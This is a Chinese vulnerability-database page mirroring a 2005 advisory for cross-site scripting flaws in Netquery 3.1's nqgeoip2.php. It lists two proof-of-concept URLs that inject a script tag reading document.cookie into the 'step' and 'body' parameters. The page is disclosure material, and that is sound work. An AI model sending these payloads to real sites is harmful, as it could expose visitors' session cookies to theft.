Netquery 3.1 – ‘nqgeoip2.php’ Multiple Cross-Site Scripting Vulnerabilities

Netquery 3.1 – ‘nqgeoip2.php’ Multiple Cross-Site Scripting Vulnerabilities

漏洞ID 1055281 漏洞类型
发布时间 2005-07-25 更新时间 2005-07-25
图片[1]-Netquery 3.1 – ‘nqgeoip2.php’ Multiple Cross-Site Scripting Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-Netquery 3.1 – ‘nqgeoip2.php’ Multiple Cross-Site Scripting Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26026
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14373/info
 
Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks.
 
Netquery 3.1 is affected by these vulnerabilities. 

http://www.example.com/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>
http://www.example.com/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>

相关推荐: Oracle E-Business Suite Multiple Unspecified SQL Injection Vulnerabilities

Oracle E-Business Suite Multiple Unspecified SQL Injection Vulnerabilities 漏洞ID 1098422 漏洞类型 Input Validation Error 发布时间 2004-06-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享